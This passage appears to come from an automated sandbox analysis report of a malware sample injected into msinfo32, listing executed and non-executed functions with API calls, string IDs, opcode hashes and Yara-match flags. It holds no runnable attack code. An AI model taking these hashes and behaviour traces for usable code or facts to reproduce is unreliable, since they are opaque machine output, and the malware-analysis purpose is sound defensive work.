                                                                                                        • Instruction Fuzzy Hash: A4900235231400022585B558060550B0485ABD7355395D015F181B595CC661DD655325
                                                                                                        Function 04E82AD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.2658456540.0000000004E10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E10000, based on PE: true
                                                                                                        • Associated: 00000010.00000002.2658456540.0000000004F39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000010.00000002.2658456540.0000000004F3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000010.00000002.2658456540.0000000004FAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_4e10000_msinfo32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: 41d8d6cb7d278ede1e8f041a12d0a286f9b647bcb66ceed2fa901eae4d5249d5
                                                                                                        • Instruction ID: aee1b9f36975cf86948c937e168b1a3a8a0dce842bc04253e7995b316db0f440
                                                                                                        • Opcode Fuzzy Hash: 41d8d6cb7d278ede1e8f041a12d0a286f9b647bcb66ceed2fa901eae4d5249d5
                                                                                                        • Instruction Fuzzy Hash: 11900235221400032545B558070550700869BD6355355D021F141A555CD661DD615125
                                                                                                        Function 04E82BE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.2658456540.0000000004E10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E10000, based on PE: true
                                                                                                        • Associated: 00000010.00000002.2658456540.0000000004F39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000010.00000002.2658456540.0000000004F3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000010.00000002.2658456540.0000000004FAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_4e10000_msinfo32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: 031ab05cd5aa3cd0fe7090bb2b3465b30aa0f0ff5c87ed239c2f13a62fe7741d
                                                                                                        • Instruction ID: f2de3ed51983b340e8fdac9d01db6b18708fd85ecd914e5e488bf89fb5fbeaa2
                                                                                                        • Opcode Fuzzy Hash: 031ab05cd5aa3cd0fe7090bb2b3465b30aa0f0ff5c87ed239c2f13a62fe7741d
                                                                                                        • Instruction Fuzzy Hash: 8390023121544842F58071584405A4600559BD1309F55D011A0469699D9665DE55B665
                                                                                                        Function 04E82BF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.2658456540.0000000004E10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E10000, based on PE: true
                                                                                                        • Associated: 00000010.00000002.2658456540.0000000004F39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000010.00000002.2658456540.0000000004F3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000010.00000002.2658456540.0000000004FAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_4e10000_msinfo32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: b4b657525b05cdf9726ae573b4248a28570b0342803c11302a1a867f7a2941b2
                                                                                                        • Instruction ID: af4b55e0ac6b4beb92f205a3c19af337e689d4f44edcdac97bd21b9533a9b585
                                                                                                        • Opcode Fuzzy Hash: b4b657525b05cdf9726ae573b4248a28570b0342803c11302a1a867f7a2941b2
                                                                                                        • Instruction Fuzzy Hash: FF90023121140802F5C07158440564A00459BD2305F95D015A042A659DCA55DF5977A5
                                                                                                        Function 04E82BA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.2658456540.0000000004E10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E10000, based on PE: true
                                                                                                        • Associated: 00000010.00000002.2658456540.0000000004F39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000010.00000002.2658456540.0000000004F3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000010.00000002.2658456540.0000000004FAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_4e10000_msinfo32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: d144b5402be8477f277db4495731f6ae90b46c8fde9c580fe03b4e13736626e6
                                                                                                        • Instruction ID: 803d8961accdc918a8744488a122f00857cdfda9411ebdef0dda45e73cbfb941
                                                                                                        • Opcode Fuzzy Hash: d144b5402be8477f277db4495731f6ae90b46c8fde9c580fe03b4e13736626e6
                                                                                                        • Instruction Fuzzy Hash: 5C90023161540802F5907158441574600459BD1305F55D011A0429659D8795DF5576A5
                                                                                                        Function 04E82B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.2658456540.0000000004E10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E10000, based on PE: true
                                                                                                        • Associated: 00000010.00000002.2658456540.0000000004F39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000010.00000002.2658456540.0000000004F3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000010.00000002.2658456540.0000000004FAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_4e10000_msinfo32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: 2dc200e5734845558dee7f7456d2b8362308af2ab80272f187516fabeeadd7bc
                                                                                                        • Instruction ID: 73fe4c267dbe126a85c6ebae0798d6e20786779c4f9d5f291bc1d3f9d73f39ad
                                                                                                        • Opcode Fuzzy Hash: 2dc200e5734845558dee7f7456d2b8362308af2ab80272f187516fabeeadd7bc
                                                                                                        • Instruction Fuzzy Hash: 0990027121240003654571584415616404A9BE1205B55D021E1419595DC565DD916129
                                                                                                        Function 02EC3F20 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 107sleepCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • Sleep.KERNELBASE(000007D0), ref: 02EC3FEC
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.2655932579.0000000002EA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EA0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_2ea0000_msinfo32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Sleep
                                                                                                        • String ID: net.dll$wininet.dll
                                                                                                        • API String ID: 3472027048-1269752229
                                                                                                        • Opcode ID: 20f5863090913fda4a4d8d76cf0f9b980cd708cbc9a8521cf3ac1590dab34810
                                                                                                        • Instruction ID: b5b83685bf6d6198adc521d17d354247f0109c479166ea172600a8339c768cff
                                                                                                        • Opcode Fuzzy Hash: 20f5863090913fda4a4d8d76cf0f9b980cd708cbc9a8521cf3ac1590dab34810
                                                                                                        • Instruction Fuzzy Hash: 5F31AEB0A40305BBD714DFA4C981FEBBBB9FB88714F10911CF619AB280D770A641CBA5
                                                                                                        Function 02EBF9CA Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 104COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.2655932579.0000000002EA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EA0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_2ea0000_msinfo32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: InitializeUninitialize
                                                                                                        • String ID: @J7<
                                                                                                        • API String ID: 3442037557-2016760708
                                                                                                        • Opcode ID: da3671b576c4b8232daada8dc48475daebfe1aa8067eabe2b1ff9e2fd6f50097
                                                                                                        • Instruction ID: 25d7ce9195736fbbbc0c9bdd8b5adee19e6ebc6389d4ebabe46ac53e0806faca
                                                                                                        • Opcode Fuzzy Hash: da3671b576c4b8232daada8dc48475daebfe1aa8067eabe2b1ff9e2fd6f50097
                                                                                                        • Instruction Fuzzy Hash: B93110B5A0060A9FDB04DFD8CC809EFB7B9BF89304B108559E915EB214D775AE458BA0
                                                                                                        Function 02EBF9D0 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 101COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.2655932579.0000000002EA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EA0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_2ea0000_msinfo32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: InitializeUninitialize
                                                                                                        • String ID: @J7<
                                                                                                        • API String ID: 3442037557-2016760708
                                                                                                        • Opcode ID: 30a6f71531db7879e2b48e1c328765ffd192768e7c297fe30202571279af61f3
                                                                                                        • Instruction ID: 730f14579ad5ea23e45bdec3fc63dc9554cfa99ec958b31b5df0d0d4dcf871dd
                                                                                                        • Opcode Fuzzy Hash: 30a6f71531db7879e2b48e1c328765ffd192768e7c297fe30202571279af61f3
                                                                                                        • Instruction Fuzzy Hash: BE3130B5A0060A9FDF04DFD8CC809EFB7B9BF89304B108559E915EB214D775EE458BA0
                                                                                                        Function 02EB4AE4 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 02EB4AA2
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.2655932579.0000000002EA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EA0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_2ea0000_msinfo32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Load
                                                                                                        • String ID:
                                                                                                        • API String ID: 2234796835-0
                                                                                                        • Opcode ID: 338fb922ceddde9226d705a8cb496d73f5e40924b2cd7384f96b55a7a640d4f7
                                                                                                        • Instruction ID: 822918a8af10cbe032d70c2aeb9794e511ac0618699e97d9c53618915228cfcf
                                                                                                        • Opcode Fuzzy Hash: 338fb922ceddde9226d705a8cb496d73f5e40924b2cd7384f96b55a7a640d4f7
                                                                                                        • Instruction Fuzzy Hash: AC017677B882239ACB21CF68A810B89B7A1EF41135F0043A9EF54DB0C2D762B41582C0
                                                                                                        Function 02EB4A30 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 02EB4AA2
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.2655932579.0000000002EA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EA0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_2ea0000_msinfo32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Load
                                                                                                        • String ID:
                                                                                                        • API String ID: 2234796835-0
                                                                                                        • Opcode ID: 13b91c398fb724290a6bfd8f40c1848a49aab752f183ec829ec08b07cc2e30f9
                                                                                                        • Instruction ID: d69acb1c23b58ddc6fd93fe1ba9671cdddbf9035f21f65d5cde836464628ea5c
                                                                                                        • Opcode Fuzzy Hash: 13b91c398fb724290a6bfd8f40c1848a49aab752f183ec829ec08b07cc2e30f9
                                                                                                        • Instruction Fuzzy Hash: C4010CB5D8020DABDF10EAE4DD41FDEB3B99F44308F1091A9E91897281F671EB15CB91
                                                                                                        Function 02EC9D50 Relevance: 1.5, APIs: 1, Instructions: 47processCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • CreateProcessInternalW.KERNELBASE(?,?,?,?,02EB87EE,00000010,?,?,?,00000044,?,00000010,02EB87EE,?,?,?), ref: 02EC9DB3
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.2655932579.0000000002EA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EA0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_2ea0000_msinfo32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CreateInternalProcess
                                                                                                        • String ID:
                                                                                                        • API String ID: 2186235152-0
                                                                                                        • Opcode ID: 95e7944543cce5b2c4fbb0de41b98fbcbaf21c039efe1640ebc56405684a71b4
                                                                                                        • Instruction ID: 316fdd62aeb794141f5f38085f3ad037c21605cbd2192cd1b59553bad5f0f906
                                                                                                        • Opcode Fuzzy Hash: 95e7944543cce5b2c4fbb0de41b98fbcbaf21c039efe1640ebc56405684a71b4
                                                                                                        • Instruction Fuzzy Hash: F801D6B2200108BFCB44DE89DC90EDB77ADAF8C714F508108BA09D7240D630FC51CBA4
                                                                                                        Function 02EA9E30 Relevance: 1.5, APIs: 1, Instructions: 38threadCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 02EA9E75
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.2655932579.0000000002EA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EA0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_2ea0000_msinfo32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CreateThread
                                                                                                        • String ID:
                                                                                                        • API String ID: 2422867632-0
                                                                                                        • Opcode ID: d7bea970cb2dd02f5888197e3ca89e3e7c40e668faaa9cc91417caf7ca6dc594
                                                                                                        • Instruction ID: d6077b36e620cac132b53023419f7ad688ab71f878f408fa91b212215e9b7f5f
                                                                                                        • Opcode Fuzzy Hash: d7bea970cb2dd02f5888197e3ca89e3e7c40e668faaa9cc91417caf7ca6dc594
                                                                                                        • Instruction Fuzzy Hash: 63F065733C130436D22071E99C02FD7769D8B80765F144425F71CDF1C0D996B44147E5
                                                                                                        Function 02EA9E2C Relevance: 1.5, APIs: 1, Instructions: 35threadCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 02EA9E75
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.2655932579.0000000002EA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EA0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_2ea0000_msinfo32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CreateThread
                                                                                                        • String ID:
                                                                                                        • API String ID: 2422867632-0
                                                                                                        • Opcode ID: 8125d97770903c71304435f1bdf6abcc95fc4969b556bd5d8f27794463d539d9
                                                                                                        • Instruction ID: 3d73b14eccae981967a48873b90cf5971cb4517924a85bc285082c908bf49c49
                                                                                                        • Opcode Fuzzy Hash: 8125d97770903c71304435f1bdf6abcc95fc4969b556bd5d8f27794463d539d9
                                                                                                        • Instruction Fuzzy Hash: 13F092723C13043AD23062E98C43FDB6B5E8F81761F258518F758EF2C1C9A6B4428BE5
                                                                                                        Function 02EC9CC0 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • RtlFreeHeap.NTDLL(00000000,00000004,00000000,19CBA06B,00000007,00000000,00000004,00000000,02EB42AA,000000F4), ref: 02EC9CFC
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.2655932579.0000000002EA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EA0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_2ea0000_msinfo32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: FreeHeap
                                                                                                        • String ID:
                                                                                                        • API String ID: 3298025750-0
                                                                                                        • Opcode ID: 11ee6f4fe670e68b04c4fbcf4560fcc96f2033ae1d980ac49e5d81d080f95a0c
                                                                                                        • Instruction ID: b9c54359611ac624cefb7fc7516545e2842e6996348b084b6509710cb7e0469c
                                                                                                        • Opcode Fuzzy Hash: 11ee6f4fe670e68b04c4fbcf4560fcc96f2033ae1d980ac49e5d81d080f95a0c
                                                                                                        • Instruction Fuzzy Hash: 2AE06D722002047FD610EF99EC40F9B37AEDF85720F008119F908AB241C631B810CBB5
                                                                                                        Function 02EC9C70 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • RtlAllocateHeap.NTDLL(02EB1F39,?,02EC5FD1,02EB1F39,02EC5AFF,02EC5FD1,?,02EB1F39,02EC5AFF,00001000,?,?,00000000), ref: 02EC9CAC
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.2655932579.0000000002EA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EA0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_2ea0000_msinfo32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: AllocateHeap
                                                                                                        • String ID:
                                                                                                        • API String ID: 1279760036-0
                                                                                                        • Opcode ID: c052594ec9451208ac238e65e670723ed15c2a3c5389a19f5b1804f41d85aef9
                                                                                                        • Instruction ID: be375e7c164aaabae0be697fdbfc163ef58d56cec6e50fe20b765f43d89259a9
                                                                                                        • Opcode Fuzzy Hash: c052594ec9451208ac238e65e670723ed15c2a3c5389a19f5b1804f41d85aef9
                                                                                                        • Instruction Fuzzy Hash: 5CE06D722002087FD610EE98DC40F9B37ADEF89720F108019F908AB240D630B9108BB5
                                                                                                        Function 02EB8830 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetFileAttributesW.KERNELBASE(?,00000002,?,?,000004D8,00000000), ref: 02EB885C
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.2655932579.0000000002EA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EA0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_2ea0000_msinfo32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: AttributesFile
                                                                                                        • String ID:
                                                                                                        • API String ID: 3188754299-0
                                                                                                        • Opcode ID: a8276470a365cd753f11b640662ee6e5bf72edccbabd521c85cc8e52512c2c73
                                                                                                        • Instruction ID: 2e4a989fed245e9340c2fa8cfe8aeeb655de4e11cf3880975d54cd2500811eee
                                                                                                        • Opcode Fuzzy Hash: a8276470a365cd753f11b640662ee6e5bf72edccbabd521c85cc8e52512c2c73
                                                                                                        • Instruction Fuzzy Hash: 0CE048716803041BEF2495E9AC45BA6335C5F44A28F648550B95CDB3C1D678E5014250
                                                                                                        Function 02EB8620 Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • SetErrorMode.KERNELBASE(00008003,?,?,02EB2220,02EC843E,02EC5AFF,02EB21EA), ref: 02EB8653
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.2655932579.0000000002EA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EA0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_2ea0000_msinfo32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: ErrorMode
                                                                                                        • String ID:
                                                                                                        • API String ID: 2340568224-0
                                                                                                        • Opcode ID: 889deb6e2cad98ca0813545c3eb581fcd9d858b092a0b49321b68ddadf1b5444
                                                                                                        • Instruction ID: 2092e2d32883c5cd7928ea3d16156efd464a889172e9a7ddd15e42c31fbe4f41
                                                                                                        • Opcode Fuzzy Hash: 889deb6e2cad98ca0813545c3eb581fcd9d858b092a0b49321b68ddadf1b5444
                                                                                                        • Instruction Fuzzy Hash: 55D05E757C03053BE611E6E88C06F5A328D5B90758F05C468BB0CDB3C2ED65F1008A65
                                                                                                        Function 02EB130B Relevance: 1.5, APIs: 1, Instructions: 20threadwindowCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • PostThreadMessageW.USER32(?,00000111,00000000,00000000), ref: 02EB131D
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.2655932579.0000000002EA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EA0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_2ea0000_msinfo32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: MessagePostThread
                                                                                                        • String ID:
                                                                                                        • API String ID: 1836367815-0
                                                                                                        • Opcode ID: 8ec3775f0e40b3bee5156ff5a0e22553932c57dfa4200919125e76a782e4c981
                                                                                                        • Instruction ID: 5b186c067b6b4d996d5784d7207d58f7c4c8f02748098ed4574aaeb9de7d5f24
                                                                                                        • Opcode Fuzzy Hash: 8ec3775f0e40b3bee5156ff5a0e22553932c57dfa4200919125e76a782e4c981
                                                                                                        • Instruction Fuzzy Hash: DBD0A732B8021C70EE2241906C42FFF776C8F41E50F004067FB04F80C1E681140506A5
                                                                                                        Function 04E82C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.2658456540.0000000004E10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E10000, based on PE: true
                                                                                                        • Associated: 00000010.00000002.2658456540.0000000004F39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000010.00000002.2658456540.0000000004F3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000010.00000002.2658456540.0000000004FAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_4e10000_msinfo32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: 25c70e8e9b9ea6a29f75033cf777a239f688f4a8b7847e4a9cc5520567e08795
                                                                                                        • Instruction ID: 1fb16b0ab076ddb8d9461d1205edb047a39be2b2ee4452fe808e470ebe807dd3
                                                                                                        • Opcode Fuzzy Hash: 25c70e8e9b9ea6a29f75033cf777a239f688f4a8b7847e4a9cc5520567e08795
                                                                                                        • Instruction Fuzzy Hash: 33B02B318014C0C5FF00F720060871739007BD0304F15C0A1D3070246E0338D0C0F175

                                                                                                        Non-executed Functions

                                                                                                        Function 04D104F8 Relevance: .1, Instructions: 146COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.2658373965.0000000004D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D10000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_4d10000_msinfo32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 6be57a8013c1579caa6332c3dc5331dc40a82abbd5e1721d119ac87d74bdcd70
                                                                                                        • Instruction ID: 14918954e727ebad41e5a284e7fb8dac941a6e6726488065d5ee927cad562ee0
                                                                                                        • Opcode Fuzzy Hash: 6be57a8013c1579caa6332c3dc5331dc40a82abbd5e1721d119ac87d74bdcd70
                                                                                                        • Instruction Fuzzy Hash: 2441C87161CB0D5FE768EF68A081676B3E2FB99304F50052DDD87C3662EA70F8468685
                                                                                                        Function 04D1DE79 Relevance: 56.5, Strings: 45, Instructions: 242COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.2658373965.0000000004D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D10000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_4d10000_msinfo32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
                                                                                                        • API String ID: 0-3558027158
                                                                                                        • Opcode ID: 63bc06787917148057ad45ffaeec727242f296b6c1b2dc91b4de05545207baeb
                                                                                                        • Instruction ID: 71eeb60ec4475794d7b69c09343a9e9904d64a36cb647251b19f0871d14d4159
                                                                                                        • Opcode Fuzzy Hash: 63bc06787917148057ad45ffaeec727242f296b6c1b2dc91b4de05545207baeb
                                                                                                        • Instruction Fuzzy Hash: 9FA15FF04482948AC7198F54B0652AFFFB1EBC6305F15816DE6E6BB243C3BE8905CB95
                                                                                                        Function 04D13B71 Relevance: 36.3, Strings: 29, Instructions: 64COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.2658373965.0000000004D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D10000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_4d10000_msinfo32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: %B`f$%Duu$%KQ%$%Vdc$*062$+400$+421$+63%$-NMQ$-Rlk$0+5%$062+$1+5+$3+4,$4+5+$4==<$63%J$7156$Fmwj$HI)%$UW*6$ajrv$dwl*$gNlq$h`*1$i`R`$iid*$iln`$nj,%
                                                                                                        • API String ID: 0-3932547586
                                                                                                        • Opcode ID: 761ddaed213d2a9041f88d77d7870c71bec3e8dcaf6e02233573fcd8ffb3dc5d
                                                                                                        • Instruction ID: 2ad03811eb22557cec0ed1ce79b438d1d7e1c61f317cfa4d7c80a6ea13d8ffdd
                                                                                                        • Opcode Fuzzy Hash: 761ddaed213d2a9041f88d77d7870c71bec3e8dcaf6e02233573fcd8ffb3dc5d
                                                                                                        • Instruction Fuzzy Hash: 403154B491834CDBCF18DF80E581ADEBB70FB14714F81A25DE9056E240CBB59A56CB8A
                                                                                                        Function 04E82890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.2658456540.0000000004E10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E10000, based on PE: true
                                                                                                        • Associated: 00000010.00000002.2658456540.0000000004F39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000010.00000002.2658456540.0000000004F3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000010.00000002.2658456540.0000000004FAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_4e10000_msinfo32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ___swprintf_l
                                                                                                        • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                        • API String ID: 48624451-2108815105
                                                                                                        • Opcode ID: b357d5c267d28ddff5877a875956177a93e939d816cc543588d581ba96b12afc
